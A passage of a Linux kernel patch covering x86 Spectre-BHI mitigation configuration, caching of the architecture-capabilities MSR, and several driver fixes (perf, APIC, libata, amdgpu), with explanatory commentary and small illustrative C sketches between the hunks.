+ 	  See also <file:Documentation/admin-guide/hw-vuln/reg-file-data-sampling.rst>
+ 
+-choice
+-	prompt "Clear branch history"
++config MITIGATION_SPECTRE_BHI
++	bool "Mitigate Spectre-BHB (Branch History Injection)"
+ 	depends on CPU_SUP_INTEL
+-	default SPECTRE_BHI_ON
++	default y
+ 	help
+ 	  Enable BHI mitigations. BHI attacks are a form of Spectre V2 attacks
+ 	  where the branch history buffer is poisoned to speculatively steer
+ 	  indirect branches.
+ 	  See <file:Documentation/admin-guide/hw-vuln/spectre.rst>
+ 
+-config SPECTRE_BHI_ON
+-	bool "on"
+-	help
+-	  Equivalent to setting spectre_bhi=on command line parameter.
+-config SPECTRE_BHI_OFF
+-	bool "off"
+-	help
+-	  Equivalent to setting spectre_bhi=off command line parameter.
+-config SPECTRE_BHI_AUTO
+-	bool "auto"
+-	help
+-	  Equivalent to setting spectre_bhi=auto command line parameter.
+-
+-endchoice
+-
+ endif
+ 
+ config ARCH_HAS_ADD_PAGES
+diff --git a/arch/x86/events/core.c b/arch/x86/events/core.c
+index 30fb4931d3871..1394312b732a3 100644
+--- a/arch/x86/events/core.c
++++ b/arch/x86/events/core.c
+@@ -1644,6 +1644,7 @@ static void x86_pmu_del(struct perf_event *event, int flags)
+ 	while (++i < cpuc->n_events) {
+ 		cpuc->event_list[i-1] = cpuc->event_list[i];
+ 		cpuc->event_constraint[i-1] = cpuc->event_constraint[i];
++		cpuc->assign[i-1] = cpuc->assign[i];
+ 	}
+ 	cpuc->event_constraint[i-1] = NULL;
+ 	--cpuc->n_events;
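
The hunk above fixes a parallel-array compaction bug: x86_pmu_del() shifted event_list[] and event_constraint[] down over the deleted slot but not assign[], so counter assignments could end up paired with the wrong events. A standalone sketch of the corrected pattern (the names are illustrative, not the kernel's):

#include <stdio.h>

#define N 4

/* deleting element idx: every parallel array must shift in the same loop */
static void del_at(int idx, int *n, int list[], int constraint[], int assign[])
{
	for (int i = idx; i + 1 < *n; i++) {
		list[i] = list[i + 1];
		constraint[i] = constraint[i + 1];
		assign[i] = assign[i + 1];	/* the line the fix adds */
	}
	(*n)--;
}

int main(void)
{
	int n = N;
	int list[N] = {10, 11, 12, 13};
	int constraint[N] = {0, 1, 2, 3};
	int assign[N] = {100, 101, 102, 103};

	del_at(1, &n, list, constraint, assign);
	for (int i = 0; i < n; i++)
		printf("event %d -> counter %d\n", list[i], assign[i]);
	return 0;
}
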
+diff --git a/arch/x86/include/asm/apic.h b/arch/x86/include/asm/apic.h
+index 3216da7074bad..36ceecd40fd93 100644
+--- a/arch/x86/include/asm/apic.h
++++ b/arch/x86/include/asm/apic.h
+@@ -12,6 +12,7 @@
+ #include <asm/mpspec.h>
+ #include <asm/msr.h>
+ #include <asm/hardirq.h>
++#include <asm/io.h>
+ 
+ #define ARCH_APICTIMER_STOPS_ON_C3	1
+ 
+@@ -109,7 +110,7 @@ static inline void native_apic_mem_write(u32 reg, u32 v)
+ 
+ static inline u32 native_apic_mem_read(u32 reg)
+ {
+-	return *((volatile u32 *)(APIC_BASE + reg));
++	return readl((void __iomem *)(APIC_BASE + reg));
+ }
+ 
+ extern void native_apic_wait_icr_idle(void);
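
The native_apic_mem_read() change above swaps a plain volatile dereference for readl(). The point of an explicit accessor is that it pins both the access width and the instruction used; with a bare dereference the compiler may pick any load form, which matters when the access is trapped and emulated (the usual motivation cited for this fix is encrypted guests whose exception handlers only decode a simple MOV). A rough x86-only sketch of the guarantee such an accessor provides, with ordinary memory standing in for the APIC page:

#include <stdint.h>
#include <stdio.h>

static inline uint32_t my_readl(const volatile void *addr)
{
	uint32_t ret;

	/* exactly one 32-bit MOV; the compiler cannot split, widen,
	 * or replace it with some other load-and-test instruction */
	__asm__ volatile("movl %1, %0"
			 : "=r"(ret)
			 : "m"(*(const volatile uint32_t *)addr)
			 : "memory");
	return ret;
}

int main(void)
{
	uint32_t reg = 0xdeadbeef;	/* stand-in for an APIC register */

	printf("0x%08x\n", (unsigned)my_readl(&reg));
	return 0;
}
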
+diff --git a/arch/x86/kernel/apic/apic.c b/arch/x86/kernel/apic/apic.c
+index 7705571100518..e1672cc77c65f 100644
+--- a/arch/x86/kernel/apic/apic.c
++++ b/arch/x86/kernel/apic/apic.c
+@@ -1760,11 +1760,11 @@ static int x2apic_state;
+ 
+ static bool x2apic_hw_locked(void)
+ {
+-	u64 ia32_cap;
++	u64 x86_arch_cap_msr;
+ 	u64 msr;
+ 
+-	ia32_cap = x86_read_arch_cap_msr();
+-	if (ia32_cap & ARCH_CAP_XAPIC_DISABLE) {
++	x86_arch_cap_msr = x86_read_arch_cap_msr();
++	if (x86_arch_cap_msr & ARCH_CAP_XAPIC_DISABLE) {
+ 		rdmsrl(MSR_IA32_XAPIC_DISABLE_STATUS, msr);
+ 		return (msr & LEGACY_XAPIC_DISABLED);
+ 	}
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 96bd3ee83a484..6d69123de3660 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -60,6 +60,8 @@ EXPORT_SYMBOL_GPL(x86_spec_ctrl_current);
+ u64 x86_pred_cmd __ro_after_init = PRED_CMD_IBPB;
+ EXPORT_SYMBOL_GPL(x86_pred_cmd);
+ 
++static u64 __ro_after_init x86_arch_cap_msr;
++
+ static DEFINE_MUTEX(spec_ctrl_mutex);
+ 
+ void (*x86_return_thunk)(void) __ro_after_init = &__x86_return_thunk;
+@@ -143,6 +145,8 @@ void __init cpu_select_mitigations(void)
+ 		x86_spec_ctrl_base &= ~SPEC_CTRL_MITIGATIONS_MASK;
+ 	}
+ 
++	x86_arch_cap_msr = x86_read_arch_cap_msr();
++
+ 	/* Select the proper CPU mitigations before patching alternatives: */
+ 	spectre_v1_select_mitigation();
+ 	spectre_v2_select_mitigation();
+@@ -300,8 +304,6 @@ static const char * const taa_strings[] = {
+ 
+ static void __init taa_select_mitigation(void)
+ {
+-	u64 ia32_cap;
+-
+ 	if (!boot_cpu_has_bug(X86_BUG_TAA)) {
+ 		taa_mitigation = TAA_MITIGATION_OFF;
+ 		return;
+@@ -340,9 +342,8 @@ static void __init taa_select_mitigation(void)
+ 	 * On MDS_NO=1 CPUs if ARCH_CAP_TSX_CTRL_MSR is not set, microcode
+ 	 * update is required.
+ 	 */
+-	ia32_cap = x86_read_arch_cap_msr();
+-	if ( (ia32_cap & ARCH_CAP_MDS_NO) &&
+-	    !(ia32_cap & ARCH_CAP_TSX_CTRL_MSR))
++	if ( (x86_arch_cap_msr & ARCH_CAP_MDS_NO) &&
++	    !(x86_arch_cap_msr & ARCH_CAP_TSX_CTRL_MSR))
+ 		taa_mitigation = TAA_MITIGATION_UCODE_NEEDED;
+ 
+ 	/*
+@@ -400,8 +401,6 @@ static const char * const mmio_strings[] = {
+ 
+ static void __init mmio_select_mitigation(void)
+ {
+-	u64 ia32_cap;
+-
+ 	if (!boot_cpu_has_bug(X86_BUG_MMIO_STALE_DATA) ||
+ 	     boot_cpu_has_bug(X86_BUG_MMIO_UNKNOWN) ||
+ 	     cpu_mitigations_off()) {
+@@ -412,8 +411,6 @@ static void __init mmio_select_mitigation(void)
+ 	if (mmio_mitigation == MMIO_MITIGATION_OFF)
+ 		return;
+ 
+-	ia32_cap = x86_read_arch_cap_msr();
+-
+ 	/*
+ 	 * Enable CPU buffer clear mitigation for host and VMM, if also affected
+ 	 * by MDS or TAA. Otherwise, enable mitigation for VMM only.
+@@ -436,7 +433,7 @@ static void __init mmio_select_mitigation(void)
+ 	 * be propagated to uncore buffers, clearing the Fill buffers on idle
+ 	 * is required irrespective of SMT state.
+ 	 */
+-	if (!(ia32_cap & ARCH_CAP_FBSDP_NO))
++	if (!(x86_arch_cap_msr & ARCH_CAP_FBSDP_NO))
+ 		static_branch_enable(&mds_idle_clear);
+ 
+ 	/*
+@@ -446,10 +443,10 @@ static void __init mmio_select_mitigation(void)
+ 	 * FB_CLEAR or by the presence of both MD_CLEAR and L1D_FLUSH on MDS
+ 	 * affected systems.
+ 	 */
+-	if ((ia32_cap & ARCH_CAP_FB_CLEAR) ||
++	if ((x86_arch_cap_msr & ARCH_CAP_FB_CLEAR) ||
+ 	    (boot_cpu_has(X86_FEATURE_MD_CLEAR) &&
+ 	     boot_cpu_has(X86_FEATURE_FLUSH_L1D) &&
+-	     !(ia32_cap & ARCH_CAP_MDS_NO)))
++	     !(x86_arch_cap_msr & ARCH_CAP_MDS_NO)))
+ 		mmio_mitigation = MMIO_MITIGATION_VERW;
+ 	else
+ 		mmio_mitigation = MMIO_MITIGATION_UCODE_NEEDED;
+@@ -507,7 +504,7 @@ static void __init rfds_select_mitigation(void)
+ 	if (rfds_mitigation == RFDS_MITIGATION_OFF)
+ 		return;
+ 
+-	if (x86_read_arch_cap_msr() & ARCH_CAP_RFDS_CLEAR)
++	if (x86_arch_cap_msr & ARCH_CAP_RFDS_CLEAR)
+ 		setup_force_cpu_cap(X86_FEATURE_CLEAR_CPU_BUF);
+ 	else
+ 		rfds_mitigation = RFDS_MITIGATION_UCODE_NEEDED;
+@@ -658,8 +655,6 @@ void update_srbds_msr(void)
+ 
+ static void __init srbds_select_mitigation(void)
+ {
+-	u64 ia32_cap;
+-
+ 	if (!boot_cpu_has_bug(X86_BUG_SRBDS))
+ 		return;
+ 
+@@ -668,8 +663,7 @@ static void __init srbds_select_mitigation(void)
+ 	 * are only exposed to SRBDS when TSX is enabled or when CPU is affected
+ 	 * by Processor MMIO Stale Data vulnerability.
+ 	 */
+-	ia32_cap = x86_read_arch_cap_msr();
+-	if ((ia32_cap & ARCH_CAP_MDS_NO) && !boot_cpu_has(X86_FEATURE_RTM) &&
++	if ((x86_arch_cap_msr & ARCH_CAP_MDS_NO) && !boot_cpu_has(X86_FEATURE_RTM) &&
+ 	    !boot_cpu_has_bug(X86_BUG_MMIO_STALE_DATA))
+ 		srbds_mitigation = SRBDS_MITIGATION_TSX_OFF;
+ 	else if (boot_cpu_has(X86_FEATURE_HYPERVISOR))
+@@ -812,7 +806,7 @@ static void __init gds_select_mitigation(void)
+ 	/* Will verify below that mitigation _can_ be disabled */
+ 
+ 	/* No microcode */
+-	if (!(x86_read_arch_cap_msr() & ARCH_CAP_GDS_CTRL)) {
++	if (!(x86_arch_cap_msr & ARCH_CAP_GDS_CTRL)) {
+ 		if (gds_mitigation == GDS_MITIGATION_FORCE) {
+ 			/*
+ 			 * This only needs to be done on the boot CPU so do it
+@@ -1521,20 +1515,25 @@ static enum spectre_v2_mitigation __init spectre_v2_select_retpoline(void)
+ 	return SPECTRE_V2_RETPOLINE;
+ }
+ 
++static bool __ro_after_init rrsba_disabled;
++
+ /* Disable in-kernel use of non-RSB RET predictors */
+ static void __init spec_ctrl_disable_kernel_rrsba(void)
+ {
+-	u64 ia32_cap;
++	if (rrsba_disabled)
++		return;
+ 
+-	if (!boot_cpu_has(X86_FEATURE_RRSBA_CTRL))
++	if (!(x86_arch_cap_msr & ARCH_CAP_RRSBA)) {
++		rrsba_disabled = true;
+ 		return;
++	}
+ 
+-	ia32_cap = x86_read_arch_cap_msr();
++	if (!boot_cpu_has(X86_FEATURE_RRSBA_CTRL))
++		return;
+ 
+-	if (ia32_cap & ARCH_CAP_RRSBA) {
+-		x86_spec_ctrl_base |= SPEC_CTRL_RRSBA_DIS_S;
+-		update_spec_ctrl(x86_spec_ctrl_base);
+-	}
++	x86_spec_ctrl_base |= SPEC_CTRL_RRSBA_DIS_S;
++	update_spec_ctrl(x86_spec_ctrl_base);
++	rrsba_disabled = true;
+ }
+ 
+ static void __init spectre_v2_determine_rsb_fill_type_at_vmexit(enum spectre_v2_mitigation mode)
+@@ -1603,13 +1602,10 @@ static bool __init spec_ctrl_bhi_dis(void)
+ enum bhi_mitigations {
+ 	BHI_MITIGATION_OFF,
+ 	BHI_MITIGATION_ON,
+-	BHI_MITIGATION_AUTO,
+ };
+ 
+ static enum bhi_mitigations bhi_mitigation __ro_after_init =
+-	IS_ENABLED(CONFIG_SPECTRE_BHI_ON)  ? BHI_MITIGATION_ON  :
+-	IS_ENABLED(CONFIG_SPECTRE_BHI_OFF) ? BHI_MITIGATION_OFF :
+-					     BHI_MITIGATION_AUTO;
++	IS_ENABLED(CONFIG_MITIGATION_SPECTRE_BHI) ? BHI_MITIGATION_ON : BHI_MITIGATION_OFF;
+ 
+ static int __init spectre_bhi_parse_cmdline(char *str)
+ {
+@@ -1620,8 +1616,6 @@ static int __init spectre_bhi_parse_cmdline(char *str)
+ 		bhi_mitigation = BHI_MITIGATION_OFF;
+ 	else if (!strcmp(str, "on"))
+ 		bhi_mitigation = BHI_MITIGATION_ON;
+-	else if (!strcmp(str, "auto"))
+-		bhi_mitigation = BHI_MITIGATION_AUTO;
+ 	else
+ 		pr_err("Ignoring unknown spectre_bhi option (%s)", str);
+ 
+@@ -1635,9 +1629,11 @@ static void __init bhi_select_mitigation(void)
+ 		return;
+ 
+ 	/* Retpoline mitigates against BHI unless the CPU has RRSBA behavior */
+-	if (cpu_feature_enabled(X86_FEATURE_RETPOLINE) &&
+-	    !(x86_read_arch_cap_msr() & ARCH_CAP_RRSBA))
+-		return;
++	if (cpu_feature_enabled(X86_FEATURE_RETPOLINE)) {
++		spec_ctrl_disable_kernel_rrsba();
++		if (rrsba_disabled)
++			return;
++	}
+ 
+ 	if (spec_ctrl_bhi_dis())
+ 		return;
+@@ -1649,9 +1645,6 @@ static void __init bhi_select_mitigation(void)
+ 	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT);
+ 	pr_info("Spectre BHI mitigation: SW BHB clearing on vm exit\n");
+ 
+-	if (bhi_mitigation == BHI_MITIGATION_AUTO)
+-		return;
+-
+ 	/* Mitigate syscalls when the mitigation is forced =on */
+ 	setup_force_cpu_cap(X86_FEATURE_CLEAR_BHB_LOOP);
+ 	pr_info("Spectre BHI mitigation: SW BHB clearing on syscall\n");
+@@ -1884,8 +1877,6 @@ static void update_indir_branch_cond(void)
+ /* Update the static key controlling the MDS CPU buffer clear in idle */
+ static void update_mds_branch_idle(void)
+ {
+-	u64 ia32_cap = x86_read_arch_cap_msr();
+-
+ 	/*
+ 	 * Enable the idle clearing if SMT is active on CPUs which are
+ 	 * affected only by MSBDS and not any other MDS variant.
+@@ -1900,7 +1891,7 @@ static void update_mds_branch_idle(void)
+ 	if (sched_smt_active()) {
+ 		static_branch_enable(&mds_idle_clear);
+ 	} else if (mmio_mitigation == MMIO_MITIGATION_OFF ||
+-		   (ia32_cap & ARCH_CAP_FBSDP_NO)) {
++		   (x86_arch_cap_msr & ARCH_CAP_FBSDP_NO)) {
+ 		static_branch_disable(&mds_idle_clear);
+ 	}
+ }
+@@ -2788,7 +2779,7 @@ static char *pbrsb_eibrs_state(void)
+ 	}
+ }
+ 
+-static const char * const spectre_bhi_state(void)
++static const char *spectre_bhi_state(void)
+ {
+ 	if (!boot_cpu_has_bug(X86_BUG_BHI))
+ 		return "; BHI: Not affected";
+@@ -2796,13 +2787,12 @@ static const char * const spectre_bhi_state(void)
+ 		return "; BHI: BHI_DIS_S";
+ 	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP))
+ 		return "; BHI: SW loop, KVM: SW loop";
+-	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) &&
+-		 !(x86_read_arch_cap_msr() & ARCH_CAP_RRSBA))
++	else if (boot_cpu_has(X86_FEATURE_RETPOLINE) && rrsba_disabled)
+ 		return "; BHI: Retpoline";
+-	else if  (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT))
+-		return "; BHI: Syscall hardening, KVM: SW loop";
++	else if (boot_cpu_has(X86_FEATURE_CLEAR_BHB_LOOP_ON_VMEXIT))
++		return "; BHI: Vulnerable, KVM: SW loop";
+ 
+-	return "; BHI: Vulnerable (Syscall hardening enabled)";
++	return "; BHI: Vulnerable";
+ }
+ 
+ static ssize_t spectre_v2_show_state(char *buf)
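
Note the shape of the spec_ctrl_disable_kernel_rrsba() rework above: the function is made idempotent by recording, in a write-once rrsba_disabled flag, that the work is already done, so bhi_select_mitigation() can also call it. A standalone sketch of that memoized one-shot pattern (plain booleans and printf stand in for the CPU feature checks and the MSR write):

#include <stdbool.h>
#include <stdio.h>

static bool rrsba_disabled;		/* __ro_after_init in the kernel */
static bool cpu_has_rrsba = true;	/* pretend the CPU is affected */
static bool cpu_has_rrsba_ctrl = true;	/* pretend the control exists */

static void disable_kernel_rrsba(void)
{
	if (rrsba_disabled)
		return;			/* already handled */

	if (!cpu_has_rrsba) {		/* nothing to disable */
		rrsba_disabled = true;
		return;
	}

	if (!cpu_has_rrsba_ctrl)	/* affected but no control: stays unsafe */
		return;

	printf("setting SPEC_CTRL_RRSBA_DIS_S\n");	/* MSR write in the kernel */
	rrsba_disabled = true;
}

int main(void)
{
	disable_kernel_rrsba();		/* does the work once */
	disable_kernel_rrsba();		/* no-op on the second call */
	printf("rrsba_disabled=%d\n", rrsba_disabled);
	return 0;
}
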
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index 08fe77d2a3f90..f2bc651c0dcd8 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1308,25 +1308,25 @@ static bool __init cpu_matches(const struct x86_cpu_id *table, unsigned long whi
+ 
+ u64 x86_read_arch_cap_msr(void)
+ {
+-	u64 ia32_cap = 0;
++	u64 x86_arch_cap_msr = 0;
+ 
+ 	if (boot_cpu_has(X86_FEATURE_ARCH_CAPABILITIES))
+-		rdmsrl(MSR_IA32_ARCH_CAPABILITIES, ia32_cap);
++		rdmsrl(MSR_IA32_ARCH_CAPABILITIES, x86_arch_cap_msr);
+ 
+-	return ia32_cap;
++	return x86_arch_cap_msr;
+ }
+ 
+-static bool arch_cap_mmio_immune(u64 ia32_cap)
++static bool arch_cap_mmio_immune(u64 x86_arch_cap_msr)
+ {
+-	return (ia32_cap & ARCH_CAP_FBSDP_NO &&
+-		ia32_cap & ARCH_CAP_PSDP_NO &&
+-		ia32_cap & ARCH_CAP_SBDR_SSDP_NO);
++	return (x86_arch_cap_msr & ARCH_CAP_FBSDP_NO &&
++		x86_arch_cap_msr & ARCH_CAP_PSDP_NO &&
++		x86_arch_cap_msr & ARCH_CAP_SBDR_SSDP_NO);
+ }
+ 
+-static bool __init vulnerable_to_rfds(u64 ia32_cap)
++static bool __init vulnerable_to_rfds(u64 x86_arch_cap_msr)
+ {
+ 	/* The "immunity" bit trumps everything else: */
+-	if (ia32_cap & ARCH_CAP_RFDS_NO)
++	if (x86_arch_cap_msr & ARCH_CAP_RFDS_NO)
+ 		return false;
+ 
+ 	/*
+@@ -1334,7 +1334,7 @@ static bool __init vulnerable_to_rfds(u64 ia32_cap)
+ 	 * indicate that mitigation is needed because guest is running on a
+ 	 * vulnerable hardware or may migrate to such hardware:
+ 	 */
+-	if (ia32_cap & ARCH_CAP_RFDS_CLEAR)
++	if (x86_arch_cap_msr & ARCH_CAP_RFDS_CLEAR)
+ 		return true;
+ 
+ 	/* Only consult the blacklist when there is no enumeration: */
+@@ -1343,11 +1343,11 @@ static bool __init vulnerable_to_rfds(u64 ia32_cap)
+ 
+ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ {
+-	u64 ia32_cap = x86_read_arch_cap_msr();
++	u64 x86_arch_cap_msr = x86_read_arch_cap_msr();
+ 
+ 	/* Set ITLB_MULTIHIT bug if cpu is not in the whitelist and not mitigated */
+ 	if (!cpu_matches(cpu_vuln_whitelist, NO_ITLB_MULTIHIT) &&
+-	    !(ia32_cap & ARCH_CAP_PSCHANGE_MC_NO))
++	    !(x86_arch_cap_msr & ARCH_CAP_PSCHANGE_MC_NO))
+ 		setup_force_cpu_bug(X86_BUG_ITLB_MULTIHIT);
+ 
+ 	if (cpu_matches(cpu_vuln_whitelist, NO_SPECULATION))
+@@ -1359,7 +1359,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 		setup_force_cpu_bug(X86_BUG_SPECTRE_V2);
+ 
+ 	if (!cpu_matches(cpu_vuln_whitelist, NO_SSB) &&
+-	    !(ia32_cap & ARCH_CAP_SSB_NO) &&
++	    !(x86_arch_cap_msr & ARCH_CAP_SSB_NO) &&
+ 	   !cpu_has(c, X86_FEATURE_AMD_SSB_NO))
+ 		setup_force_cpu_bug(X86_BUG_SPEC_STORE_BYPASS);
+ 
+@@ -1367,15 +1367,15 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	 * AMD's AutoIBRS is equivalent to Intel's eIBRS - use the Intel feature
+ 	 * flag and protect from vendor-specific bugs via the whitelist.
+ 	 */
+-	if ((ia32_cap & ARCH_CAP_IBRS_ALL) || cpu_has(c, X86_FEATURE_AUTOIBRS)) {
++	if ((x86_arch_cap_msr & ARCH_CAP_IBRS_ALL) || cpu_has(c, X86_FEATURE_AUTOIBRS)) {
+ 		setup_force_cpu_cap(X86_FEATURE_IBRS_ENHANCED);
+ 		if (!cpu_matches(cpu_vuln_whitelist, NO_EIBRS_PBRSB) &&
+-		    !(ia32_cap & ARCH_CAP_PBRSB_NO))
++		    !(x86_arch_cap_msr & ARCH_CAP_PBRSB_NO))
+ 			setup_force_cpu_bug(X86_BUG_EIBRS_PBRSB);
+ 	}
+ 
+ 	if (!cpu_matches(cpu_vuln_whitelist, NO_MDS) &&
+-	    !(ia32_cap & ARCH_CAP_MDS_NO)) {
++	    !(x86_arch_cap_msr & ARCH_CAP_MDS_NO)) {
+ 		setup_force_cpu_bug(X86_BUG_MDS);
+ 		if (cpu_matches(cpu_vuln_whitelist, MSBDS_ONLY))
+ 			setup_force_cpu_bug(X86_BUG_MSBDS_ONLY);
+@@ -1394,9 +1394,9 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	 * TSX_CTRL check alone is not sufficient for cases when the microcode
+ 	 * update is not present or running as guest that don't get TSX_CTRL.
+ 	 */
+-	if (!(ia32_cap & ARCH_CAP_TAA_NO) &&
++	if (!(x86_arch_cap_msr & ARCH_CAP_TAA_NO) &&
+ 	    (cpu_has(c, X86_FEATURE_RTM) ||
+-	     (ia32_cap & ARCH_CAP_TSX_CTRL_MSR)))
++	     (x86_arch_cap_msr & ARCH_CAP_TSX_CTRL_MSR)))
+ 		setup_force_cpu_bug(X86_BUG_TAA);
+ 
+ 	/*
+@@ -1422,7 +1422,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	 * Set X86_BUG_MMIO_UNKNOWN for CPUs that are neither in the blacklist,
+ 	 * nor in the whitelist and also don't enumerate MSR ARCH_CAP MMIO bits.
+ 	 */
+-	if (!arch_cap_mmio_immune(ia32_cap)) {
++	if (!arch_cap_mmio_immune(x86_arch_cap_msr)) {
+ 		if (cpu_matches(cpu_vuln_blacklist, MMIO))
+ 			setup_force_cpu_bug(X86_BUG_MMIO_STALE_DATA);
+ 		else if (!cpu_matches(cpu_vuln_whitelist, NO_MMIO))
+@@ -1430,7 +1430,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	}
+ 
+ 	if (!cpu_has(c, X86_FEATURE_BTC_NO)) {
+-		if (cpu_matches(cpu_vuln_blacklist, RETBLEED) || (ia32_cap & ARCH_CAP_RSBA))
++		if (cpu_matches(cpu_vuln_blacklist, RETBLEED) || (x86_arch_cap_msr & ARCH_CAP_RSBA))
+ 			setup_force_cpu_bug(X86_BUG_RETBLEED);
+ 	}
+ 
+@@ -1443,7 +1443,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 	 * disabling AVX2. The only way to do this in HW is to clear XCR0[2],
+ 	 * which means that AVX will be disabled.
+ 	 */
+-	if (cpu_matches(cpu_vuln_blacklist, GDS) && !(ia32_cap & ARCH_CAP_GDS_NO) &&
++	if (cpu_matches(cpu_vuln_blacklist, GDS) && !(x86_arch_cap_msr & ARCH_CAP_GDS_NO) &&
+ 	    boot_cpu_has(X86_FEATURE_AVX))
+ 		setup_force_cpu_bug(X86_BUG_GDS);
+ 
+@@ -1452,11 +1452,11 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 			setup_force_cpu_bug(X86_BUG_SRSO);
+ 	}
+ 
+-	if (vulnerable_to_rfds(ia32_cap))
++	if (vulnerable_to_rfds(x86_arch_cap_msr))
+ 		setup_force_cpu_bug(X86_BUG_RFDS);
+ 
+ 	/* When virtualized, eIBRS could be hidden, assume vulnerable */
+-	if (!(ia32_cap & ARCH_CAP_BHI_NO) &&
++	if (!(x86_arch_cap_msr & ARCH_CAP_BHI_NO) &&
+ 	    !cpu_matches(cpu_vuln_whitelist, NO_BHI) &&
+ 	    (boot_cpu_has(X86_FEATURE_IBRS_ENHANCED) ||
+ 	     boot_cpu_has(X86_FEATURE_HYPERVISOR)))
+@@ -1466,7 +1466,7 @@ static void __init cpu_set_bug_bits(struct cpuinfo_x86 *c)
+ 		return;
+ 
+ 	/* Rogue Data Cache Load? No! */
+-	if (ia32_cap & ARCH_CAP_RDCL_NO)
++	if (x86_arch_cap_msr & ARCH_CAP_RDCL_NO)
+ 		return;
+ 
+ 	setup_force_cpu_bug(X86_BUG_CPU_MELTDOWN);
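
All of the ARCH_CAP_* bits tested above come from a single MSR, IA32_ARCH_CAPABILITIES (0x10a), which this series now reads once and caches in x86_arch_cap_msr instead of re-reading in each mitigation routine. For what it's worth, the raw value can also be inspected from userspace through the standard Linux msr driver (modprobe msr, needs root); a small sketch assuming only that interface:

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

#define MSR_IA32_ARCH_CAPABILITIES 0x10a

int main(void)
{
	uint64_t val;
	int fd = open("/dev/cpu/0/msr", O_RDONLY);

	if (fd < 0) {
		perror("open /dev/cpu/0/msr");
		return 1;
	}
	/* the msr driver maps the pread offset to the MSR number */
	if (pread(fd, &val, sizeof(val), MSR_IA32_ARCH_CAPABILITIES) !=
	    (ssize_t)sizeof(val)) {
		perror("pread");
		close(fd);
		return 1;
	}
	printf("IA32_ARCH_CAPABILITIES = 0x%016llx\n",
	       (unsigned long long)val);
	close(fd);
	return 0;
}
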
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index a09548630fc8b..65fde5717928b 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -4667,7 +4667,7 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			 * bail out.
+ 			 */
+ 			if (ap->pflags & ATA_PFLAG_SUSPENDED)
+-				goto unlock;
++				goto unlock_ap;
+ 
+ 			if (!sdev)
+ 				continue;
+@@ -4680,7 +4680,7 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			if (do_resume) {
+ 				ret = scsi_resume_device(sdev);
+ 				if (ret == -EWOULDBLOCK)
+-					goto unlock;
++					goto unlock_scan;
+ 				dev->flags &= ~ATA_DFLAG_RESUMING;
+ 			}
+ 			ret = scsi_rescan_device(sdev);
+@@ -4688,12 +4688,13 @@ void ata_scsi_dev_rescan(struct work_struct *work)
+ 			spin_lock_irqsave(ap->lock, flags);
+ 
+ 			if (ret)
+-				goto unlock;
++				goto unlock_ap;
+ 		}
+ 	}
+ 
+-unlock:
++unlock_ap:
+ 	spin_unlock_irqrestore(ap->lock, flags);
++unlock_scan:
+ 	mutex_unlock(&ap->scsi_scan_mutex);
+ 
+ 	/* Reschedule with a delay if scsi_rescan_device() returned an error */
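
The libata hunk above is a lock-scope fix: ap->lock is taken and dropped inside the loop while scsi_scan_mutex is held for the whole function, so one unlock: label could not serve every error path, and the -EWOULDBLOCK path (reached with ap->lock already dropped) must skip the inner unlock. A standalone sketch of the two-label exit pattern using pthreads:

#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t scan_mutex = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t ap_lock = PTHREAD_MUTEX_INITIALIZER;

static int rescan(int fail_outside_ap_lock)
{
	int ret = 0;

	pthread_mutex_lock(&scan_mutex);
	pthread_mutex_lock(&ap_lock);

	if (fail_outside_ap_lock) {
		/* simulate an error from a call made with ap_lock
		 * dropped: release it here, then exit via the label
		 * that does not touch it again */
		pthread_mutex_unlock(&ap_lock);
		ret = -1;
		goto unlock_scan;
	}

	/* errors noticed while still holding ap_lock exit here */
	goto unlock_ap;

unlock_ap:
	pthread_mutex_unlock(&ap_lock);
unlock_scan:
	pthread_mutex_unlock(&scan_mutex);
	return ret;
}

int main(void)
{
	printf("%d %d\n", rescan(0), rescan(1));	/* "0 -1" */
	return 0;
}
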
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index 56af7b5abac14..56cc59629d96b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -460,10 +460,8 @@ static bool soc21_need_full_reset(struct amdgpu_device *adev)
+ {
+ 	switch (adev->ip_versions[GC_HWIP][0]) {
+ 	case IP_VERSION(11, 0, 0):
+-		return amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__UMC);
+ 	case IP_VERSION(11, 0, 2):
+ 	case IP_VERSION(11, 0, 3):
+-		return false;
+ 	default:
+ 		return true;
+ 	}
+@@ -780,10 +778,35 @@ static int soc21_common_suspend(void *handle)
+ 	return soc21_common_hw_fini(adev);
+ }
+ 
++static bool soc21_need_reset_on_resume(struct amdgpu_device *adev)
++{
++	u32 sol_reg1, sol_reg2;
++
++	/* Will reset for the following suspend abort cases.
++	 * 1) Only reset dGPU side.
++	 * 2) S3 suspend got aborted and TOS is active.
